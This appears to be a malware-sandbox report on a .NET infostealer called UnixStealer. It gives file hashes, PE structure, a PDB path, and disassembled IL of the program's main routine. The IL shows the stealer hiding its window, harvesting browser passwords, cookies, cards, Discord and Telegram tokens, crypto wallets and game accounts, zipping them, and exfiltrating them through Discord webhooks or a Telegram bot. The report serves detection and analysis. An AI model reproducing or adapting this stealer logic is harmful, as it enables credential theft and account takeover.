Malicious
Malicious

7a883b8fa7be91171e8b668a3b72a5e2

PE Executable
|
MD5: 7a883b8fa7be91171e8b668a3b72a5e2
|
Size: 303.55 KB
|
application/x-dosexec

Print
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
7a883b8fa7be91171e8b668a3b72a5e2
Sha1
694464447e0fdd0a8332151ba7ea8bce59247d60
Sha256
42cfb7c71744bc3f0fcf02e326f2d85b0b285a02a2a75b4578c34f592eb0af59
Sha384
c616826a316a6e5c38412c162695601d9346e30da14ac7506eff6408df3dbf73fe6f91bb4f246c30beb65edfea58d681
Sha512
bff1d745cc07ada237053b9ae0cf193662897ce32edf5c97a59cc687b01a346efebee8bed892983537d352ad8116a193b53400cb975ae5150aee939c5eacd8d6
SSDeep
6144:i59IhSQf0Ou8yegCyThvFhIpWbYNoAIIypwC+9bJjU/HIR6pUi:Hh6OTyejyThvFhIpQrAHYR/H7Ui
TLSH
F7545C0127ED4659F2FF6BF8E4B1212583B1B862F83EDB8F6D4464ED1922740D950BA3
File Structure
7a883b8fa7be91171e8b668a3b72a5e2
Malicious
Overlay_2e6d7888.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_2e6d7888.bin (450 bytes)
Info

PDB Path: C:\Users\brtig\OneDrive\Desktop\Src\UnixStealer\UnixStealer\obj\Release\UnixStealer.pdb
Module Name

UnixStealer.exe
Full Name

UnixStealer.exe
EntryPoint

System.Void UnixStealer.Program::Main(System.String[])
Scope Name

UnixStealer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

UnixStealer
Assembly Version

1.6.2.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1550
Main Method

System.Void UnixStealer.Program::Main(System.String[])
Main IL Instruction Count

777
Main IL

call System.Void UnixStealer.Stealth::HideConsole() call System.Void UnixStealer.Stealth::PreventClose() call System.Void UnixStealer.Stealth::SetProcessPriority() leave.s IL_0014: ldsfld System.String UnixStealer.Help::ExploitDir pop <null> leave.s IL_0014: ldsfld System.String UnixStealer.Help::ExploitDir ldsfld System.String UnixStealer.Help::ExploitDir call System.Boolean System.IO.File::Exists(System.String) brtrue IL_0864: ret call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.String System.Diagnostics.Process::get_ProcessName() call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> conv.i4 <null> ldc.i4.1 <null> bne.un IL_0864: ret ldsfld System.String UnixStealer.Help::ExploitDir call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.Threading.Thread>::.ctor() stloc.0 <null> ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 dup <null> brtrue.s IL_006B: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 dup <null> brtrue.s IL_0095: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 dup <null> brtrue.s IL_00BF: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_2() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 dup <null> brtrue.s IL_00E9: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_3() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 dup <null> brtrue.s IL_0113: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_9 br.s IL_0133: ldloca.s V_9 ldloca.s V_9 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Start() ldloca.s V_9 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0127: ldloca.s V_9 leave.s IL_014C: ldloc.0 ldloca.s V_9 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_9 br.s IL_0162: ldloca.s V_9 ldloca.s V_9 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Join() ldloca.s V_9 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0156: ldloca.s V_9 leave.s IL_017B: call System.Guid System.Guid::NewGuid() ldloca.s V_9 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Guid System.Guid::NewGuid() stloc.s V_10 ldloca.s V_10 ldstr N call System.String System.Guid::ToString(System.String) ldc.i4.0 <null> ldc.i4.7 <null> callvirt System.String System.String::Substring(System.Int32,System.Int32) callvirt System.String System.String::ToUpper() stloc.1 <null> ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String UnixStealer.Help::ExploitDir stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr \Unix- stelem.ref <null> dup <null> ldc.i4.2 <null> call System.String System.Environment::get_UserName() callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr - stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.1 <null> stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr .zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.2 <null> ldstr cp866 call System.Text.Encoding System.Text.Encoding::GetEncoding(System.String) newobj System.Void Ionic.Zip.ZipFile::.ctor(System.Text.Encoding) stloc.s V_11 ldloc.s V_11 ldc.i4.m1 <null> conv.i8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_ParallelDeflateThreshold(System.Int64) ldloc.s V_11 ldc.i4.2 <null> callvirt System.Void Ionic.Zip.ZipFile::set_UseZip64WhenSaving(Ionic.Zip.Zip64Option) ldloc.s V_11 ldc.i4.s 9 callvirt System.Void Ionic.Zip.ZipFile::set_CompressionLevel(Ionic.Zlib.CompressionLevel) ldloc.s V_11 ldc.i4.8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_CompressionMethod(Ionic.Zip.CompressionMethod) ldloc.s V_11 ldc.i4.0 <null> callvirt System.Void Ionic.Zip.ZipFile::set_Strategy(Ionic.Zlib.CompressionStrategy) ldloc.s V_11 ldstr callvirt System.Void Ionic.Zip.ZipFile::set_Comment(System.String) ldloc.s V_11 ldsfld System.String UnixStealer.Help::ExploitDir callvirt Ionic.Zip.ZipEntry Ionic.Zip.ZipFile::AddDirectory(System.String) pop <null> ldloc.s V_11 ldloc.2 <null> callvirt System.Void Ionic.Zip.ZipFile::Save(System.String) leave.s IL_0242: ldc.i4.s 37 ldloc.s V_11 brfalse.s IL_0241: endfinally ldloc.s V_11 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.s 37 newarr System.String dup <null> ldc.i4.0 <null> ldstr @everyone **Unix Stealer** **System Info** ```Computer Name: stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Computer OS: stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr Total Memory: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.SystemInfo::GetRAM() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr UUID: stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String UnixStealer.SystemInfo::GetProcessorID() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr CPU: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String UnixStealer.SystemInfo::GetCPUName() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr GPU: stelem.ref <null> dup <null> ldc.i4.s 11 call System.String UnixStealer.SystemInfo::GetGpuName() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr ``` **IP Info** ```IP: stelem.ref <null> dup <null> ldc.i4.s 13 call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr Region: stelem.ref <null> dup <null> ldc.i4.s 15 call System.String UnixStealer.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr Country: stelem.ref <null> dup <null> ldc.i4.s 17 call System.String UnixStealer.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr ``` **Grabbed Data** ```Cookies: stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 UnixStealer.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr Passwords: stelem.ref <null> dup <null> ldc.i4.s 21 ldsflda System.Int32 UnixStealer.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 22 ldstr Credit Cards: stelem.ref <null> dup <null> ldc.i4.s 23 ldsflda System.Int32 UnixStealer.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 24 ldstr AutoFills: stelem.ref <null> dup <null> ldc.i4.s 25 ldsflda System.Int32 UnixStealer.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 UnixStealer.Counting::Discord ldc.i4.0 <null> bgt.s IL_0350: ldstr "\nDiscord Tokens: Yes" ldstr br.s IL_0355: stelem.ref ldstr Discord Tokens: Yes stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 UnixStealer.Counting::Telegram ldc.i4.0 <null> bgt.s IL_0368: ldstr "\nTelegram Sessions: Yes" ldstr br.s IL_036D: stelem.ref ldstr Telegram Sessions: Yes stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 UnixStealer.Counting::Wallets ldc.i4.0 <null> bgt.s IL_0380: ldstr "\nCrypto Wallets: Yes" ldstr br.s IL_0385: stelem.ref ldstr Crypto Wallets: Yes stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 UnixStealer.Counting::Steam ldc.i4.0 <null> bgt.s IL_0398: ldstr "\nSteam: Yes" ldstr br.s IL_039D: stelem.ref ldstr Steam: Yes stelem.ref <null> dup <null> ldc.i4.s 30 ldsfld System.Int32 UnixStealer.Counting::Epic ldc.i4.0 <null> bgt.s IL_03B0: ldstr "\nEpic Games: Yes" ldstr br.s IL_03B5: stelem.ref ldstr Epic Games: Yes stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.Int32 UnixStealer.Counting::Uplay ldc.i4.0 <null> bgt.s IL_03C8: ldstr "\nUplay: Yes" ldstr br.s IL_03CD: stelem.ref ldstr Uplay: Yes stelem.ref <null> dup <null> ldc.i4.s 32 ldsfld System.Int32 UnixStealer.Counting::Roblox ldc.i4.0 <null> bgt.s IL_03E0: ldstr "\nRoblox: Yes" ldstr br.s IL_03E5: stelem.ref ldstr Roblox: Yes stelem.ref <null> dup <null> ldc.i4.s 33 ldsfld System.Int32 UnixStealer.Counting::Growtopia ldc.i4.0 <null> bgt.s IL_03F8: ldstr "\nGrowtopia: Yes" ldstr br.s IL_03FD: stelem.ref ldstr Growtopia: Yes stelem.ref <null> dup <null> ldc.i4.s 34 ldsfld System.Int32 UnixStealer.Counting::Webcam ldc.i4.0 <null> bgt.s IL_0410: ldstr "\nWebcam: Yes" ldstr br.s IL_0415: stelem.ref ldstr Webcam: Yes stelem.ref <null> dup <null> ldc.i4.s 35 ldsfld System.Int32 UnixStealer.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0428: ldstr "\nFileZilla Accounts: " ldstr br.s IL_043C: stelem.ref ldstr FileZilla Accounts: ldsflda System.Int32 UnixStealer.Counting::FileZilla call System.String System.Int32::ToString() call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 36 ldstr ``` stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.3 <null> ldc.i4.s 37 newarr System.String dup <null> ldc.i4.0 <null> ldstr <b>🔥 Unix Stealer</b> <b>💻 System Info</b> <code>Computer Name: stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Computer OS: stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr Total Memory: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.SystemInfo::GetRAM() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr UUID: stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String UnixStealer.SystemInfo::GetProcessorID() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr CPU: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String UnixStealer.SystemInfo::GetCPUName() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr GPU: stelem.ref <null> dup <null> ldc.i4.s 11 call System.String UnixStealer.SystemInfo::GetGpuName() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr </code> <b>🌍 IP Info</b> <code>IP: stelem.ref <null> dup <null> ldc.i4.s 13 call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr Region: stelem.ref <null> dup <null> ldc.i4.s 15 call System.String UnixStealer.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr Country: stelem.ref <null> dup <null> ldc.i4.s 17 call System.String UnixStealer.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr </code> <b>📊 Grabbed Data</b> <code>Cookies: stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 UnixStealer.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr Passwords: stelem.ref <null> dup <null> ldc.i4.s 21 ldsflda System.Int32 UnixStealer.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 22 ldstr Credit Cards: stelem.ref <null> dup <null> ldc.i4.s 23 ldsflda System.Int32 UnixStealer.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 24 ldstr AutoFills: stelem.ref <null> dup <null> ldc.i4.s 25 ldsflda System.Int32 UnixStealer.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 UnixStealer.Counting::Discord ldc.i4.0 <null> bgt.s IL_055A: ldstr "\nDiscord Tokens: Yes" ldstr br.s IL_055F: stelem.ref ldstr Discord Tokens: Yes stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 UnixStealer.Counting::Telegram ldc.i4.0 <null> bgt.s IL_0572: ldstr "\nTelegram Sessions: Yes" ldstr br.s IL_0577: stelem.ref ldstr Telegram Sessions: Yes stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 UnixStealer.Counting::Wallets ldc.i4.0 <null> bgt.s IL_058A: ldstr "\nCrypto Wallets: Yes" ldstr br.s IL_058F: stelem.ref ldstr Crypto Wallets: Yes stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 UnixStealer.Counting::Steam ldc.i4.0 <null> bgt.s IL_05A2: ldstr "\nSteam: Yes" ldstr br.s IL_05A7: stelem.ref ldstr Steam: Yes stelem.ref <null> dup <null> ldc.i4.s 30 ldsfld System.Int32 UnixStealer.Counting::Epic ldc.i4.0 <null> bgt.s IL_05BA: ldstr "\nEpic Games: Yes" ldstr br.s IL_05BF: stelem.ref ldstr Epic Games: Yes stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.Int32 UnixStealer.Counting::Uplay ldc.i4.0 <null> bgt.s IL_05D2: ldstr "\nUplay: Yes" ldstr br.s IL_05D7: stelem.ref ldstr Uplay: Yes stelem.ref <null> dup <null> ldc.i4.s 32 ldsfld System.Int32 UnixStealer.Counting::Roblox ldc.i4.0 <null> bgt.s IL_05EA: ldstr "\nRoblox: Yes" ldstr br.s IL_05EF: stelem.ref ldstr Roblox: Yes stelem.ref <null> dup <null> ldc.i4.s 33 ldsfld System.Int32 UnixStealer.Counting::Growtopia ldc.i4.0 <null> bgt.s IL_0602: ldstr "\nGrowtopia: Yes" ldstr br.s IL_0607: stelem.ref ldstr Growtopia: Yes stelem.ref <null> dup <null> ldc.i4.s 34 ldsfld System.Int32 UnixStealer.Counting::Webcam ldc.i4.0 <null> bgt.s IL_061A: ldstr "\nWebcam: Yes" ldstr br.s IL_061F: stelem.ref ldstr Webcam: Yes stelem.ref <null> dup <null> ldc.i4.s 35 ldsfld System.Int32 UnixStealer.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0632: ldstr "\nFileZilla Accounts: " ldstr br.s IL_0646: stelem.ref ldstr FileZilla Accounts: ldsflda System.Int32 UnixStealer.Counting::FileZilla call System.String System.Int32::ToString() call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 36 ldstr </code> stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_4 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Unix- stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_UserName() callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr - stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr .zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_5 ldstr zip stloc.s V_6 ldloc.2 <null> stloc.s V_7 ldstr stloc.s V_8 ldc.i4.0 <null> stloc.s V_12 ldloc.s V_7 newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.Int64 System.IO.FileInfo::get_Length() ldc.i4 1048576 conv.i8 <null> div <null> stloc.s V_13 ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0718: ldsfld System.String UnixStealer.Config::telegramBotToken ldloc.s V_13 ldc.i4.8 <null> conv.i8 <null> bge.s IL_06DC: ldloc.3 ldloc.3 <null> ldloc.s V_5 ldloc.s V_6 ldloc.s V_7 ldloc.s V_8 call System.String DiscordWebhook::SendFile(System.String,System.String,System.String,System.String,System.String) pop <null> ldc.i4.1 <null> stloc.s V_12 br.s IL_06FC: leave.s IL_0718 ldloc.3 <null> ldstr ⚠️ **Log file is too large for Discord ( ldloca.s V_13 call System.String System.Int64::ToString() ldstr MB). Trying Telegram...** call System.String System.String::Concat(System.String,System.String,System.String,System.String) call System.String DiscordWebhook::Send(System.String) pop <null> ldc.i4.1 <null> stloc.s V_12 leave.s IL_0718: ldsfld System.String UnixStealer.Config::telegramBotToken stloc.s V_14 ldstr Discord error: ldloc.s V_14 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave.s IL_0718: ldsfld System.String UnixStealer.Config::telegramBotToken ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0786: ldloc.s V_12 ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0786: ldloc.s V_12 ldloc.s V_4 call System.Void UnixStealer.Telegram::SendMessage(System.String) ldloc.s V_13 ldc.i4.s 50 conv.i8 <null> bge.s IL_074C: ldstr "⚠️ <b>Log file is too large (" ldloc.s V_7 ldstr Unix Stealer Log call System.Void UnixStealer.Telegram::SendFile(System.String,System.String) br.s IL_0767: ldc.i4.1 ldstr ⚠️ <b>Log file is too large ( ldloca.s V_13 call System.String System.Int64::ToString() ldstr MB).</b> Only system info sent. call System.String System.String::Concat(System.String,System.String,System.String) call System.Void UnixStealer.Telegram::SendMessage(System.String) ldc.i4.1 <null> stloc.s V_12 leave.s IL_0786: ldloc.s V_12 stloc.s V_15 ldstr Telegram error: ldloc.s V_15 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave.s IL_0786: ldloc.s V_12 ldloc.s V_12 brtrue.s IL_0794: leave.s IL_07F5 ldstr No delivery method configured. Build with Builder to inject config. call System.Void System.Console::WriteLine(System.String) leave.s IL_07F5: ldsfld System.Boolean UnixStealer.Config::PutOnStartup stloc.s V_16 ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07CA: ldsfld System.String UnixStealer.Config::discordWebhook ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07CA: ldsfld System.String UnixStealer.Config::discordWebhook ldloc.s V_4 ldstr ⚠️ <b>Error sending file:</b> ldloc.s V_16 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String,System.String) call System.Void UnixStealer.Telegram::SendMessage(System.String) br.s IL_07EE: leave.s IL_07F3 ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07EE: leave.s IL_07F3 ldloc.3 <null> ldstr ⚠️ **Error sending file:** ldloc.s V_16 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String,System.String) call System.String DiscordWebhook::Send(System.String) pop <null> leave.s IL_07F3: leave.s IL_07F5 pop <null> leave.s IL_07F3: leave.s IL_07F5 leave.s IL_07F5: ldsfld System.Boolean UnixStealer.Config::PutOnStartup ldsfld System.Boolean UnixStealer.Config::PutOnStartup brfalse.s IL_0803: nop call System.Void UnixStealer.Program::Finish() br.s IL_0828: leave.s IL_0864 nop <null> ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String UnixStealer.Help::ExploitDir ldstr \ call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0828: leave.s IL_0864 pop <null> leave.s IL_0828: leave.s IL_0864 leave.s IL_0864: ret stloc.s V_17 call System.String System.IO.Path::GetTempPath() ldstr stealer_error.txt call System.String System.IO.Path::Combine(System.String,System.String) ldstr Error: ldloc.s V_17 callvirt System.String System.Exception::get_Message() ldstr Stack Trace: ldloc.s V_17 callvirt System.String System.Exception::get_StackTrace() call System.String System.String::Concat(System.String,System.String,System.String,System.String) call System.Void System.IO.File::WriteAllText(System.String,System.String) leave.s IL_0862: leave.s IL_0864 pop <null> leave.s IL_0862: leave.s IL_0864 leave.s IL_0864: ret ret <null>
7a883b8fa7be91171e8b668a3b72a5e2 (303.55 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙